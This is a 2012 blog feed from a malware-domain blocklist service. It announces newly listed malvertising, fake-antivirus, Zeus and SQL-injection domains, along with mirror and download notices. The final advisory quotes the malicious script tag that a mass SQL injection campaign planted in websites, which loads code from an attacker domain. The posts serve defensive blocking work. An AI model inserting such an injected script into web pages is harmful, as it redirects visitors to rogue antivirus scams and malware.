Feed

Site Delisting: kollshi.com

Posted on April 30th, 2012 in Removed Domains by dglosser

kollshi.com has been delisted and will be removed on the next update

malvertising,malicious js, bugat domains

Posted on April 29th, 2012 in New Domains by dglosser

Added 137 domains associated with google safebrowsing, malvertising, malicious javascript, etc. Sources include exposure.iseclab.org, safebrowsing.clients.google.com, stopmalvertising.com and others (all sources are listed in our domain.txt file.)

Compressed files are located at: http://www.malware-domains.com (full zone files, note the dash)  and http://dns-bh.sagadc.org/.  We also have a mirror dedicated to research and Open Source Projects – contact us for details.

* Please help to keep this site free and donate whatever you can:  All donations go to hosting and infrastructure costs.
* These malware block lists provided here are for free for noncommercial use as part of the fight against malware.   Any use of this list commercially is strictly prohibited without prior approval.
* Please use the “datestamp” and “timestamp” file to determine if the list has been updated and ONLY pull the files you need – abusers will be banned! Use wget -N”!
* Yearly sponsorships are available. Full acknowledgment, an icon, and link back to your site will be placed in the left sidebar.
* Domains.txt file is the complete list along with original reference. Justdomains contains list of only the domain names. BOOT file is in MS DNS format. Malwaredomains.zones file is in BIND format.  Also Available in AdBlock, ISA, and MaraDNS formats. A trusted source on the WOT-the Web of Trust . Used by SURBL, MOREnet, SANs, and others…

sqli: Block Njukol -dot – com

Posted on April 29th, 2012 in 0day,iframes,New Domains,sql injection by dglosser

We received a report that there’s  a sqli injection going on with  njukol . com/ r.php.  Please check your web sites and add this to your block or shun list.      Original Source: http://ilion.blog47.fc2.com/

Check your download scripts ASAP

Posted on April 29th, 2012 in Domain News,mirror by dglosser

Check your download scripts ASAP….

Too many users are STILL pointing to the main www site for the zone files, which have not been here for MONTHS…

PLEASE update your scripts to pull from one of the download mirrors. DO NOT point to the www (blog) site  as there is nothing to download.

 

Small Update – 4/27

Posted on April 28th, 2012 in malvertising,New Domains,Trojans,zeus by dglosser

Had server issues on the blog site so this is a few days late..  Added a couple of dozen malvertising, zeus, palevo and other harmful domains on 4/27.

Too many users are STILL pointing to the main (blog) site for the zone files and are causing server issues…

PLEASE update your scripts to pull from one of the download mirrors or your site will be BANNED

 

 

 

Adblock Plus Issue

Posted on April 24th, 2012 in New Domains by dglosser

We realize there are problems with the Adblock Plus subscriptions. The issue is being looked at and should be resolved soon.

Fake-AV, exploit, malvertising domains

Posted on April 21st, 2012 in malvertising,New Domains,rogue antivirus,Trojans,zlob by dglosser

Added 124 domains associated with rogue/fake AV, malvertising, exploits, etc. Sources include hosts-file.net, www.emergingthreats.net, www.urlvoid.com
(all sources are listed in our domain.txt file.)

Compressed files are located at: http://www.malware-domains.com (full zone files, note the dash)  and http://dns-bh.sagadc.org/.  We also have a mirror dedicated to research and Open Source Projects – contact us for details.

* Please help to keep this site free and donate whatever you can:  All donations go to hosting and infrastructure costs.
* These malware block lists provided here are for free for noncommercial use as part of the fight against malware.   Any use of this list commercially is strictly prohibited without prior approval.
* Please use the “datestamp” and “timestamp” file to determine if the list has been updated and ONLY pull the files you need – abusers will be banned! Use wget -N”!
* Yearly sponsorships are available. Full acknowledgment, an icon, and link back to your site will be placed in the left sidebar.
* Domains.txt file is the complete list along with original reference. Justdomains contains list of only the domain names. BOOT file is in MS DNS format. Malwaredomains.zones file is in BIND format.  Also Available in AdBlock, ISA, and MaraDNS formats. A trusted source on the WOT-the Web of Trust . Used by SURBL, MOREnet, SANs, and others…

The Suspicious Domains List at SANS

Posted on April 18th, 2012 in Domain News by dglosser

After some maintenance downtime, the Suspicious Domains lists at https://isc.sans.edu/tools/suspicious_domains.html have been re-launched. This project was developed by handler Jason Lam and is an effort to assemble weighted lists of suspicious domains based on tracking, malware and other sources

.

 

 

hostexploit.com top bad hosts – 2012 Q1

Posted on April 18th, 2012 in iframes,malvertising,New Domains,sql injection,Trojans by dglosser

We added our friends nikjju . com and best-antiviruu.de .lv and also listed domains from ISP’s or hosting services listed on hostexploit.com‘s  Q1 report on the top bad hosts.  To round things out,  we also added domains flagged by  sucuri  as having malicious javascript or iframes.

Compressed files are located at: http://www.malware-domains.com (full zone files, note the dash)  and http://dns-bh.sagadc.org/.  We also have a mirror dedicated to research and Open Source Projects – contact us for details.

* Please help to keep this site free and donate whatever you can:  All donations go to hosting and infrastructure costs.
* These malware block lists provided here are for free for noncommercial use as part of the fight against malware.   Any use of this list commercially is strictly prohibited without prior approval.
* Please use the “datestamp” and “timestamp” file to determine if the list has been updated and ONLY pull the files you need – abusers will be banned! Use wget -N”!
* Yearly sponsorships are available. Full acknowledgment, an icon, and link back to your site will be placed in the left sidebar.
* Domains.txt file is the complete list along with original reference. Justdomains contains list of only the domain names. BOOT file is in MS DNS format. Malwaredomains.zones file is in BIND format.  Also Available in AdBlock, ISA, and MaraDNS formats. A trusted source on the WOT-the Web of Trust . Used by SURBL, MOREnet, SANs, and others…

Urgent Block: nikjju.com and best-antiviruu.de.lv

Posted on April 17th, 2012 in 0day,iframes,rogue antivirus,sql injection by dglosser

Sucuri  is reporting a new Mass SQL Injection campaign.  Sites are infected with the following javascript:

<script src= http://nikjju . com/r.php ></script>

which redirects to Fake/Rogue AV sites such as best-antiviruu. de. lv

Please add these sites to your blocklists and sinkholes ASAP.